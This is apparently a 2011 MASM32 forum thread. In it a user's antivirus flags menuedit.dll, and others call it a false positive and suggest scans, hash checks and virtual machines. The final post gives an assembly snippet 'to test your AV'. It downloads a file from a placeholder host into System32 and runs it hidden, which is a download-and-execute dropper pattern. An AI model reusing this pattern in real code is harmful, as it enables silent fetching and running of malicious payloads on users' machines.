Was having a bunch of problems with a program, so I decided to do a virus scan. It found an infected file in my MASM32 folder, menuedit.dll, which it quarantined.
Is this a part of the MASM32 package? If so, can I get a replacement for it (without having to reinstall the whole package)? If not, I wonder how it got there ...
menuedit.dll , a file of the Masm32 package is completely safe. Here is Jotti's report :
http://virusscan.jotti.org/tr/scanresult/284999b01635f27ec6fe6f16363ecb7c7c0bde3e
Probably, your antivirus software reported a false-positive.
That link does me no good; I don't even know what language that's written in.
So is this needed for MASM32? What's it's purpose?
That's Turkish. Check this link if you want the English version:
http://virusscan.jotti.org/en/scanresult/284999b01635f27ec6fe6f16363ecb7c7c0bde3e
Hmm; I use PC Tools AntiVirus (a freebie). I didn't see it in the list.
So what if the file really was infected?
Could be a false alarm
Similar case:
http://www.masm32.com/board/index.php?topic=11488.0
Quote from: NoCforMe on November 12, 2011, 11:10:07 AM
Hmm; I use PC Tools AntiVirus (a freebie). I didn't see it in the list.
So what if the file really was infected?
Here is a quick way to learn : Try to extract the dll file from the Masm32 package in another computer ( a safe and clean one ) and compare the md5 values of the clean dll and yours. You can try a Windows \ Linux based live CD if have no access to another computer.
one thing - when you run across a page in a different language, use translate.google.com (http://translate.google.com)
copy/paste the URL into the left-hand pane, then click on it in the right-hand pane
it will also translate plain-text in small chunks
you will use this quite often when learning programming, as many languages are used
as for the DLL, i doubt it's infected
i haven't seen many viruses that infect DLL's
however, check the file size against the one posted on jotti page
you can also upload your own file there and test it :U
I reloaded MASM32 and submitted menuedit.dll to Jotti's malware scan (which is actually a very useful service that I've bookmarked); it basically told me "don't worry". So I won't.
But this raises several disturbing questions about viruses, malware, etc, especially since we seem to be so promiscuous here with executable files. I think we should take potential threats very seriously. (I would hate to be the source of a virus, unknowingly, that could infect other people's computers.) So I think it's best to err on the side of caution here, rather than dismissively hand-wave about how this is probably not a problem.
I'm still having strange problems with some code I'm writing, which is crashing on a CreateWindowEx() call for no apparent reason, but I scanned my system and it seems to be clean.
Couple other things: I actually think it's kind of rude to post a link in a foreign language and expect people to find it useful. Whlie i realize that this is an international forum, it's obvious that the common language here is English, not Turkish. (I would expect the same complaint if I posted English links on a Turkish site, by the way.) That's just my take.
Regarding Google-translating a page, thanks but no thanks. Have you ever actually tried this? and then tried to make sense of the results? Maybe if a foreign-language page was the only source of information, I might try this. Otherwise, life's just too damn short. Again, just my take.
And can anybody please tell me what menuedit.dll actually does? Why do I need it? My virus program (PC Tools) reported it as a "Trojan-uploader obfuscated N", whatever that means. I guess there must be some code in there that's self-replicating or something.
when i d/l someones code....
i check to see if the EXE size is reasonable - you have to take resources into account
i generally don't run EXE's unless the source is included - and i assemble it myself
there are exceptions - like when it's someone i trust
as for the language thing....
i don't consider it rude at all
Erol (Vortex) is a major contributer
his expertise has helped me a lot
there are going to be several cases where you need to adjust to what is, rather than what you'd like
an example that comes to mind is the four-f tutorial for writing KMD's
and, yes, i have used google translate many times
it isn't perfect, but i can generally figure out what the intent is in foriegn text
it is not easy to write a translator, either
the truth is, i find it interesting to communicate with people from all over the world
but, that's just my take
menuedit.dll is used by QE, for editing menus (i assume :P )
I find it very interesting that you are compiling programs on your primary computer, unless I am mistaken of course.
I haven't done that for a very long time. I used to use my primary system for that until I realised that doing so put my system at risk. It used to annoy the crap out of me to rebuild it, after running either rougue software or a crashing program destroyed it. I now use Virtualbox https://www.virtualbox.org/ and build an environment in there.
That way if the program crashes the VM (Virtual Machine), no problem, just restart. Also I have snapshot of the VM before I think that I am going to do anything major or risky....or just plain stuipid. I can then step back before the problem, heaps better than M$ system restore.
You can ofcourse build a base image (Using Ghost or similar) and reload it to the PC, but it always be out of date.
The other thing is that I never run as admin on my primary PC. I have just enough rights to do what I need to do. I do run as admin in the VM, but that doesn't matter.
Also there is MS free AV http://windows.microsoft.com/en-AU/windows/products/security-essentials
Anyway sorry to go, just my 2 cents.
Quote from: AParsons on November 12, 2011, 10:20:07 PM
I find it very interesting that you are compiling programs on your primary computer, unless I am mistaken of course.
You're not mistaken; that's exactly what I'm doing.
I completely understand your concerns; if I weren't poor, I'd get another computer to develop on. Someday ...
Quote from: NoCforMe on November 12, 2011, 06:55:22 PM
I actually think it's kind of rude to post a link in a foreign language...
Quote from: AParsons on November 12, 2011, 10:20:07 PM
I find it very interesting that you are compiling programs on your primary computer...
Wow, this thread has all the ingredients for becoming "religious" :clap:
Will I land in hell because I use my primary computer for assembling my stuff? ::)
What if I use http://virusscan.jotti.org/
it/scanresult/284999b01635f27ec6fe6f16363ecb7c7c0bde3e (http://virusscan.jotti.org/it/scanresult/284999b01635f27ec6fe6f16363ecb7c7c0bde3e) instead of tr? ::)
Io non parlo Italiano :red
jj2007,
Everyone does what they do, for what ever their reasons, I mentioned Virtualbox because I have spent countless hours re-building / re-installing my PC in the past, that is just lost time that I could have been doing something else.
Also I hope that suggesting a VM may save some people some time and grief.
If you use your primary PC for assembling stuff, that's up to you.
Just trying to help, that's all.
NoCforMe,
My intention was to help you and I know that this is an international forum. Also, it's true that the language of this forum is English and this is OK as we have here a lot of members from different countries but there is no any reason for you to be offended in any way. Probably, I should switch to the English page of Jotti's site before posting here the link but the auto-sense feature of Google Chrome ( or Jotti ) is setting the language option depending on your OS configuration. That explains the confusion and nobody is rude here. You can probably understand that I am trying to address you with a friendly voice and please take it easy.
The reason why there is an AV sh*tlist sub forum is to report this type of crap AV scanners. The DLL "menuedit" is part of QE and has been installed successfully on MILLIONS of computers without problems. The problem is in using crappy freebies downloaded off the internet that flag clean software as suspicious.
The sum total of the MASM32 SDK is built on an isolated computer from its own source code (apart from specific binaries) and it has NEVER had any infected files included in it. Refer to the MASM32 installation page for how to resolve problems of incorrectly configured computers in terms of either OS settings or downmarket AV scanners.
NoCforMe, if you are in doubt, you could submit your suspicious files to other antivirus vendors ;) .
In your case, that file is original and clean.
Well, I submitted it to jotti, which found it to be clean, so I'm not worried about it. (And the problem with my program turned out to be a stoopid mistake.)
Vortex, sorry, didn't mean to criticize you personally. I have bookmarked that site, as it's pretty useful. Smart, too: when I submitted the file, it told me it had already been submitted and found to be OK.
So Hutch, what exactly does that DLL do that my AV finds objectionable? (Without revealing any trade secrets, of course.)
NoCforMe,
You are asking the wrong person, a reliable specification Portable Executable DLL is all it needs to be. The problem is using crap AV products downloaded from the internet.
Quote from: NoCforMe on November 13, 2011, 05:18:56 AM
So Hutch, what exactly does that DLL do that my AV finds objectionable? (Without revealing any trade secrets, of course.)
To test your AV, try to assemble, link (as console app) and run this snippet:
include \masm32\include\masm32rt.inc
uselib Urlmon
.code
start: inkey "Hello World"
exit
invoke URLDownloadToFile,0,chr$("http://123.456.789"), chr$("C:\Windows\System32\test.exe"),0,0
invoke WinExec, chr$("C:\Windows\System32\test.exe"), SW_HIDE
end start